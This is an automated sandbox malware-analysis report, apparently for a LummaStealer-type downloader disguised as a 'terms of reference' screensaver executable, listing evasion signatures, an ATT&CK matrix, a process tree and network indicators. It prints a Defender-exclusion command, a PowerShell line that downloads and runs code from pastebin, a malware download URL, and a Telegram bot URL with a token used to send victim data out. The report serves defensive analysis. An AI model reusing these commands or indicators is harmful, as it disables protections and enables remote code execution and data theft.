Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: section name: .CLR_UEF
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: section name: .didat
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: section name: Section
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848E0D2A5 pushad ; iretd 2_2_00007FF848E0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848FF2316 push 8B485F93h; iretd 2_2_00007FF848FF231B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe Memory allocated: 25772100000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe Window / User API: threadDelayed 3403
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe Window / User API: threadDelayed 457
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7900
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1739
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7560
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2169
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3202
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6444
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe API coverage: 0.0 %
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe TID: 4464 Thread sleep count: 51 > 30
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe TID: 4464 Thread sleep count: 3403 > 30
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe TID: 4464 Thread sleep count: 457 > 30
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe TID: 2472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128 Thread sleep count: 7900 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108 Thread sleep count: 1739 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep count: 7560 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep count: 2169 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572 Thread sleep count: 3202 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572 Thread sleep count: 6444 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624 Thread sleep time: -5534023222112862s >= -30000s
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2386070213.0000029809673000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2591390743.00000298096B4000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162133220.0000029809671000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2592055488.000002980973B000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.3041372249.000002980973B000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2890720432.0000029809682000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.3040911001.00000298096A3000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2386719702.00000298096B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: powershell.exe, 00000004.00000002.2194411243.000001F7694B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FF8B2743843
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES792.tmp" "c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeCode function: 0_2_00007FF6A7F903BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6A7F903BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2386070213.0000029809673000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2591390743.00000298096B4000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2592513695.00000298097D9000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2591390743.00000298097CD000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162133220.0000029809671000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2890720432.0000029809682000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.3040911001.00000298096A3000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.3136813783.00000298096C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
MITRE ATT&CK Matrix (one technique per tactic column per row; digits preceding a technique name are the report's badge markers, reproduced as displayed)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Disable or Modify Tools | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 131 Virtualization/Sandbox Evasion | Security Account Manager | 121 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph (ID: 1617329; Sample: Terms_of_reference_06_01_20...; Startdate: 17/02/2025; Architecture: WINDOWS; Score: 100)

Sample-level network and signature nodes:
  • pastebin.com: Connects to a pastebin service (likely for C&C)
  • api.telegram.org: Uses the Telegram API (likely for C&C communication)
  • 2 other IPs or domains
  • Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures

Process tree (numbers after a process name are the graph's created-registry-value / created-file counters as displayed):
  • Terms_of_reference_06_01_2025_samsung.scr.exe 11 (started)
      • Network: ip-api.com 208.95.112.1, 49720, 80, TUT-ASUS, United States; api.telegram.org 149.154.167.220, 443, 49726, 59790, TELEGRAMRU, United Kingdom; 2 other IPs or domains
      • Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender
      • powershell.exe 14 24 (started)
          • Network: pastebin.com 172.67.19.24, 443, 49704, CLOUDFLARENETUS, United States
          • Dropped: C:\Users\user\AppData\...\xy2h0pkm.cmdline, Unicode
          • Signature: Writes to foreign memory regions
          • csc.exe 3 (started)
              • Dropped: C:\Users\user\AppData\Local\...\xy2h0pkm.dll, PE32
              • cvtres.exe 1 (started)
          • conhost.exe (started)
      • powershell.exe 23 (started)
          • Signature: Loading BitLocker PowerShell Module
          • conhost.exe (started)
      • powershell.exe (started)
          • conhost.exe (started)

Source | Detection | Scanner | Label | Link
Terms_of_reference_06_01_2025_samsung.scr.exe | 59% | ReversingLabs | Win64.Downloader.LummaStealer |
Terms_of_reference_06_01_2025_samsung.scr.exe | 56% | Virustotal | | Browse
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://schemas.datacontract.org/2004/07/SystemV | 0% | Avira URL Cloud | safe |
http://89.23.97.214/TeamBuild/win64_svchost.exeh | 0% | Avira URL Cloud | safe |
http://schemas.datacontract.org/2004/07/System.Xml | 0% | Avira URL Cloud | safe |
http://89.23.97.214:80/ | 0% | Avira URL Cloud | safe |
http://89.23.97.214/TeamBuild/win32_svchost.exe | 100% | Avira URL Cloud | malware |
http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w | 0% | Avira URL Cloud | safe |
http://api.ipify.orgnotification_sent.flag | 0% | Avira URL Cloud | safe |
http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer | 0% | Avira URL Cloud | safe |
http://schemas.datacontract.org/2004/07/System.Xml.Linq | 0% | Avira URL Cloud | safe |
http://schemas.datacontract.org/2004/07/System.Runtime.Serialization | 0% | Avira URL Cloud | safe |
http://schemas.datacontract.org/2004/07/SystemY | 0% | Avira URL Cloud | safe |
http://89.23.97.214/TeamBuild/win32_svchost.exehttp://89.23.97.214/TeamBuild/win64_svchost.exewin32_ | 0% | Avira URL Cloud | safe |
http://schemas.datacontract.org/2004/07/System.IO | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 172.67.74.152 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
pastebin.com | 172.67.19.24 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002264615855&text=%F0%9F%8F%B4%20%20Country%3A%20United%20States%0A%E2%9C%96%EF%B8%8F%20IP%3A%208.46.123.189%0A%E2%9C%96%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%E2%9C%96%EF%B8%8F%20OS%3A%20Microsoft%20Windows%2010%20Pro%0A%E2%9C%96%EF%B8%8F%20Language%3A%20English%20%28Switzerland%29%0A | false | | high
https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage | false | | high
https://pastebin.com/raw/WHKzW2nr | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
